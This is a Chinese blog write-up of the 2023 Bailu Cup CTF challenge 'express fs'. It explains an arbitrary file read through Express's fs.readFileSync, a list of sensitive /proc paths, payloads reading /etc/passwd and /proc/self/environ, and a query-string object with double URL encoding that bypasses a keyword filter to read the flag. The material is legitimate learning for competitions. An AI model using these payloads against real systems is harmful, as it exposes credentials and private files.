[wp]2023柏鹭杯 express fs

最新推荐文章于 2024-11-18 20:50:55 发布

W3nd4L0v3

最新推荐文章于 2024-11-18 20:50:55 发布

阅读量434

点赞数 3

分类专栏： CTF writeup Web安全文章标签： web安全网络安全 node.js

本文链接：https://blog.csdn.net/m0_63138919/article/details/133788307

版权

CTF 同时被 3 个专栏收录

24 篇文章 0 订阅

订阅专栏

Web安全

14 篇文章 0 订阅

订阅专栏

writeup

13 篇文章 0 订阅

订阅专栏

文章讲述了如何在Node.jsweb应用中利用fs模块绕过WAF限制，通过精心构造的GET请求参数和理解JavaScript原型污染原理，实现对敏感文件如flag.txt的访问。涉及的知识点包括URL编码、file协议和进程信息探测。

摘要由CSDN通过智能技术生成

一道很有意思的node题，需要深入node的fs中去探索,用node写的一个简易web应用，发送get请求查询查看源码有个?file=check.html路径我们使用?file=/etc/passwd 可以直接访问任意文件但是访问不了flag,可能被waf禁掉了

但实际上它并不简单，node不像php有伪协议可以绕，也没办法用什么编码绕过等，因为url编码后的字符串传递给 fs.readFileSync 后其并不会对得到的字符串进行解码操作，它只是尝试检查文件系统上是否存在与该字符串完全匹配的文件，并且 Unicode 尝试不会起作用。

说到 js 首先想到的应该是 prototype pollution(原型链污染), 但是注意到我们就算传参污染也只能污染 req.query.file 的 __proto__ , 而且由于它没有与任何东西合并，你只能污染你自己对象的属性——你已经可以任意分配属性了，所以那也没用。

然后这里有一个在《从0到1CTFer成长之路》配套的一道web题afr_3有个同样的知识点:

/proc/sched_debug # 提供cpu上正在运行的进程信息，可以获得进程的pid号，可以配合后面需要pid的利用
/proc/mounts # 挂载的文件系统列表
/proc/net/arp # arp表，可以获得内网其他机器的地址
/proc/net/route # 路由表信息
/proc/net/tcp and /proc/net/udp # 活动连接的信息
/proc/net/fib_trie # 路由缓存
/proc/version  # 内核版本
/proc/[PID]/cmdline # 可能包含有用的路径信息
/proc/[PID]/environ #  程序运行的环境变量信息，可以用来包含getshell
/proc/[PID]/cwd     # 当前进程的工作目录
/proc/[PID]/fd/[#] # 访问file descriptors，某写情况可以读取到进程正在使用的文件，比如access.log

利用这个我们就可以使用payload:

?file=/proc/self/environ

得到 server这个路径

使用payload:

?file=/proc/self/cmdline

得到源码然后根据路径可以读取

源码：

const express = require("express");
const fs = require("fs");

const app = express();

const PORT = process.env.PORT || 80;

app.use('/static', express.static('static'))

app.use((req, res, next) => {
  if (
    [req.body, req.headers, req.query].some(
      (item) => item && JSON.stringify(item).includes("flag")
    )
  ) {
    return res.send("臭黑客!");
  }
  next();
});

app.get("/", (req, res) => {
  try {
    res.setHeader("Content-Type", "text/html");
    res.send(fs.readFileSync(req.query.file || "index.html").toString());
  } catch (err) {
    console.log(err);
    res.status(500).send("Internal server error");
  }
});

app.listen(PORT, () => console.log(`express server listening on port ${PORT}`));

看到这里

就有一道可以说一模一样的题：corCtf2022一道有意思的node题（含有具体解析调试）

https://cloud.tencent.com/developer/article/2123023具体访问：https://cloud.tencent.com/developer/article/2123023

所以最终的payload:

由上文分析可知我们可以传一个对象实例，这个 file 对象满足如下条件

.href 存在
.origin 存在
.protocol === 'file:'
.hostname === ''
.pathname 是/app/flag.txt URL 编码的（注意：这需要双 URL 编码，因为 Express 已经 URL 解码一次）

这样就能绕过 WAF 成功读取到flag了

最终得到：

?file[href]=a&file[origin]=1&file[protocol]=file:&file[hostname]=&file[pathname]=/app/fl%2561g.txt

因为赛后题目官方没给环境复现，所以理解就行